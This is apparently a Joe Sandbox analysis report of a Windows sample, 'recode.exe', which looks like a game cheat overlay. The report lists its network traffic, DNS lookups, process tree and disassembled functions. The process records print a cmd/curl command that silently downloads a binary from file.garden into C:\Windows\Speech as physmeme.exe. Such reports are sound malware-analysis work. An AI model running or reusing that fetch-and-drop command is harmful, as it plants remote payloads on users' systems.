api-ms-win-crt-convert-l1-1-0.dll	atof
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale, ___lc_codepage_func
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:16:08.596399069 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:08.596432924 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:08.596491098 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:08.607310057 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:08.607327938 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.082046032 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.082180023 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:09.084778070 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:09.084783077 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.085181952 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.088099957 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:09.135319948 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194411993 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194475889 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194520950 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194545984 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194608927 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:09.194619894 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194632053 CET	443	49708	104.21.16.1	192.168.2.8
Jan 13, 2025 13:16:09.194684029 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:09.206342936 CET	49708	443	192.168.2.8	104.21.16.1
Jan 13, 2025 13:16:09.206350088 CET	443	49708	104.21.16.1	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:16:08.577981949 CET	61577	53	192.168.2.8	1.1.1.1
Jan 13, 2025 13:16:08.590003014 CET	53	61577	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:16:08.577981949 CET	192.168.2.8	1.1.1.1	0x5594	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:16:08.590003014 CET	1.1.1.1	192.168.2.8	0x5594	No error (0)	file.garden	104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	104.21.16.1	443	6776	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:16:09 UTC	101	OUT	GET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2025-01-13 12:16:09 UTC	550	IN	HTTP/1.1 403 Forbidden Date: Mon, 13 Jan 2025 12:16:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrC2995L8eqQMizxCZ4zq68s0auO69Ec7YcfklffCOLthFeEj0z%2FRAaZ%2FX8l2pVXO8aeGLZ5KS9wSyDpTWAF7oC0NlNDWSJSB9bWVOLoUIhR4MNFmqWEko4fKwtvDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901550d92b5a41ba-EWR
2025-01-13 12:16:09 UTC	819	IN	Data Raw: 31 31 64 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11db<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-01-13 12:16:09 UTC	1369	IN	Data Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
2025-01-13 12:16:09 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
2025-01-13 12:16:09 UTC	1022	IN	Data Raw: 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 Data Ascii: ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb
2025-01-13 12:16:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:16:07
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\recode.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\recode.exe"
Imagebase:	0x7ff758000000
File size:	890'368 bytes
MD5 hash:	0023578E24D6ED38DAF9C364137A8929
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:16:07
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:16:07
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff677420000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:16:07
Start date:	13/01/2025
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff704f50000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:16:11
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c cls
Imagebase:	0x7ff677420000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.4%
Total number of Nodes:	226
Total number of Limit Nodes:	3

Executed Functions

Function 00007FF758002610 Relevance: 44.1, APIs: 6, Strings: 19, Instructions: 324
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF758002663
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF758002758
__std_fs_code_page.MSVCPRT ref: 00007FF7580027AE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7580028BB
ShellExecuteW.SHELL32 ref: 00007FF758002AF1

Strings

$/, xrefs: 00007FF758002930
go, xrefs: 00007FF7580028FF
*-, xrefs: 00007FF758002929
5+, xrefs: 00007FF75800293E
VZ, xrefs: 00007FF758002A80
\X, xrefs: 00007FF7580028EA
h\ph, xrefs: 00007FF758002771
<5, xrefs: 00007FF758002922
oc, xrefs: 00007FF7580028E3
e), xrefs: 00007FF758002937
3,, xrefs: 00007FF75800291B
NI, xrefs: 00007FF7580028F8
ysme, xrefs: 00007FF758002778
exists, xrefs: 00007FF758002624
Z#, xrefs: 00007FF75800290D
me.e, xrefs: 00007FF75800277F
SW, xrefs: 00007FF7580028F1
^B, xrefs: 00007FF758002A79
M[, xrefs: 00007FF758002906

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ExceptionExecuteShellThrow__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
String ID: $/$*-$3,$5+$<5$M[$NI$SW$VZ$Z#$\X$^B$exists$e)$go$h\ph$me.e$oc$ysme
API String ID: 4003505496-3089918366
Opcode ID: da34eec27d97580e87602099d6fdd4077316ac6946946a56d2b83714bfcc0ba1
Instruction ID: dce82237f0453a0900d315862bd47e42d2b4bfecc77184f85dd7aab6c88ee29e
Opcode Fuzzy Hash: da34eec27d97580e87602099d6fdd4077316ac6946946a56d2b83714bfcc0ba1
Instruction Fuzzy Hash: F9E10772F187818BF702DF74D0012ADB771EF5A784F848325EE5836A9AEB38A149C714

Non-executed Functions

Function 00007FF758048650 Relevance: 55.7, APIs: 28, Strings: 2, Instructions: 3181stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF758015EB0: memmove.VCRUNTIME140 ref: 00007FF758015F69

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758048DA6
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758048DC0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758048DDB
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758048DF8
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758048EE5
sqrt.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 00007FF758049235

Part of subcall function 00007FF75805CC30: DeviceIoControl.KERNEL32 ref: 00007FF75805CD7C

tanf.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 00007FF758049271
tanf.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 00007FF75804941E
strstr.VCRUNTIME140(?), ref: 00007FF75804A5EA
strstr.VCRUNTIME140(?), ref: 00007FF75804ABAA

Part of subcall function 00007FF75805CBA0: DeviceIoControl.KERNEL32 ref: 00007FF75805CC11

Part of subcall function 00007FF7580030E0: memmove.VCRUNTIME140(?,?,?,?,00007FF758001A25), ref: 00007FF758003118

Part of subcall function 00007FF758047400: __stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7580474B6
Part of subcall function 00007FF758047400: MultiByteToWideChar.KERNEL32 ref: 00007FF7580474D8
Part of subcall function 00007FF758047400: memset.VCRUNTIME140 ref: 00007FF758047506
Part of subcall function 00007FF758047400: MultiByteToWideChar.KERNEL32 ref: 00007FF75804751F
Part of subcall function 00007FF758047400: WideCharToMultiByte.KERNEL32 ref: 00007FF758047592

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75804C269
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75804C270
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75804C277
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF75804C27E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF75804C285
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF75804C28C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF75804C293
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75804C29A
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75804C42A

Part of subcall function 00007FF758045E50: DeviceIoControl.KERNEL32 ref: 00007FF758045ECC

Part of subcall function 00007FF758045B50: DeviceIoControl.KERNEL32 ref: 00007FF758045BCC

Part of subcall function 00007FF758045AB0: DeviceIoControl.KERNEL32 ref: 00007FF758045B2D

Strings

a[P_TNR8a[P_TNR8Building Plan, xrefs: 00007FF75804A48A
2, xrefs: 00007FF758049501

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ControlDevice$powf$ByteCharMultiWide$memmovesqrtfstrstrtanf$__stdio_common_vsnprintf_smemsetsqrt
String ID: 2$a[P_TNR8a[P_TNR8Building Plan
API String ID: 64780426-3080726919
Opcode ID: 1be9a8f5bf4958f7c314df4ece612cf94c27755f7b7e74caac6b2090473556bb
Instruction ID: 57647b818d38382be4f252be4a0500c7c59295227ec66ad6b59d3a9288c89243
Opcode Fuzzy Hash: 1be9a8f5bf4958f7c314df4ece612cf94c27755f7b7e74caac6b2090473556bb
Instruction Fuzzy Hash: 8F83FC62D19BC58AE722DF35D8412F9E320FF55388F889332EA4D265E5DF38A189C714

Function 00007FF75805FC84 Relevance: 33.2, APIs: 22, Instructions: 224
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF75805FD31
GetLastError.KERNEL32 ref: 00007FF75805FD3B
FindFirstFileW.KERNEL32 ref: 00007FF75805FD52
GetLastError.KERNEL32 ref: 00007FF75805FD5E
FindClose.KERNEL32 ref: 00007FF75805FD6C
__std_fs_open_handle.LIBCPMT ref: 00007FF75805FDFF
CloseHandle.KERNEL32 ref: 00007FF75805FE15
CloseHandle.KERNEL32 ref: 00007FF75805FF92
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75805FF9C

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: d3de40aef3f753d4d6f96bb09c596f524a2afca1fe43b75ce632c9c1829ac108
Instruction ID: b959f1c49e4d48ecac6c7b18c551b1ebe935e3cd8a30e851a4f6f0bd5b7a0c32
Opcode Fuzzy Hash: d3de40aef3f753d4d6f96bb09c596f524a2afca1fe43b75ce632c9c1829ac108
Instruction Fuzzy Hash: 6E91B231B08A4247E674AB25A814279E391AF46BB4F9C0334DABE47AD5DF3CE44D8734

Function 00007FF758053150 Relevance: 32.1, APIs: 15, Strings: 3, Instructions: 642
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF758045E50: DeviceIoControl.KERNEL32 ref: 00007FF758045ECC

Part of subcall function 00007FF758045B50: DeviceIoControl.KERNEL32 ref: 00007FF758045BCC

DeviceIoControl.KERNEL32 ref: 00007FF7580532A2

Part of subcall function 00007FF7580030E0: memmove.VCRUNTIME140(?,?,?,?,00007FF758001A25), ref: 00007FF758003118

Part of subcall function 00007FF7580014C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF7580014CB
Part of subcall function 00007FF7580014C0: __std_exception_copy.VCRUNTIME140 ref: 00007FF758001504

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580534C2

Part of subcall function 00007FF758001420: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF75805E4CB), ref: 00007FF758001464

FindWindowA.USER32 ref: 00007FF7580538CA
MessageBoxA.USER32 ref: 00007FF758053A8E
GetSystemMetrics.USER32 ref: 00007FF758053A96
GetSystemMetrics.USER32 ref: 00007FF758053AA3
SetWindowPos.USER32 ref: 00007FF758053AD4
GetWindowLongA.USER32 ref: 00007FF758053B0E
SetWindowLongA.USER32 ref: 00007FF758053B2D
DwmExtendFrameIntoClientArea.DWMAPI ref: 00007FF758053B4C
ShowWindow.USER32 ref: 00007FF758053B62
UpdateWindow.USER32 ref: 00007FF758053B6F
ShowWindow.USER32 ref: 00007FF758053B7E

Strings

BOT, xrefs: 00007FF7580531CF
KVZE=, xrefs: 00007FF758053521
@, xrefs: 00007FF758053ABD

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: Window$ControlDevice$LongMetricsShowSystem__std_exception_copy$AreaClientConcurrency::cancel_current_taskExtendFindFrameIntoMessageUpdateXlength_error@std@@memmove
String ID: @$BOT$KVZE=
API String ID: 2149274906-3306102780
Opcode ID: cd6fd8ee60721c15787a6e884bcf1f9180167603eeee4192da737eee64c89307
Instruction ID: 8c54971c434a73e45b35fb9b3453cde6c5f5322260da5e988ae31247d5779fe7
Opcode Fuzzy Hash: cd6fd8ee60721c15787a6e884bcf1f9180167603eeee4192da737eee64c89307
Instruction Fuzzy Hash: 0642FD26E1978247F702DB35A4011A9E760AFA7784F85D336EA5C32AD1EF3DF1858314

Function 00007FF758031B60 Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF758031B99
QueryPerformanceCounter.KERNEL32 ref: 00007FF758031BAC
LoadLibraryA.KERNEL32 ref: 00007FF758031C85
GetProcAddress.KERNEL32 ref: 00007FF758031CAC
GetProcAddress.KERNEL32 ref: 00007FF758031CC0

Strings

xinput9_1_0.dll, xrefs: 00007FF758031C56
XInputGetState, xrefs: 00007FF758031CB2
xinput1_3.dll, xrefs: 00007FF758031C4A
imgui_impl_win32, xrefs: 00007FF758031C04
xinput1_2.dll, xrefs: 00007FF758031C62
XInputGetCapabilities, xrefs: 00007FF758031C9E
xinput1_4.dll, xrefs: 00007FF758031C3E
xinput1_1.dll, xrefs: 00007FF758031C6E

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: AddressPerformanceProcQuery$CounterFrequencyLibraryLoad
String ID: XInputGetCapabilities$XInputGetState$imgui_impl_win32$xinput1_1.dll$xinput1_2.dll$xinput1_3.dll$xinput1_4.dll$xinput9_1_0.dll
API String ID: 925518172-3912092517
Opcode ID: a5f2324166db4ad94d3658be54c81155c90817acadb36eba787ca9086cf32000
Instruction ID: d3b832619d57cb21be3736cff38158bdc45ee5ecc260f7044f84c8ef88e2c311
Opcode Fuzzy Hash: a5f2324166db4ad94d3658be54c81155c90817acadb36eba787ca9086cf32000
Instruction Fuzzy Hash: 0C418431B18B81D7E750AB11F940269F3A4FB48790F885135DA8D43B95EF3CE0A9C318

Function 00007FF7580254E0 Relevance: 17.8, APIs: 11, Instructions: 1315COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7580256BC
memset.VCRUNTIME140 ref: 00007FF7580256CE
memset.VCRUNTIME140 ref: 00007FF75802584C
memset.VCRUNTIME140 ref: 00007FF758025879

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
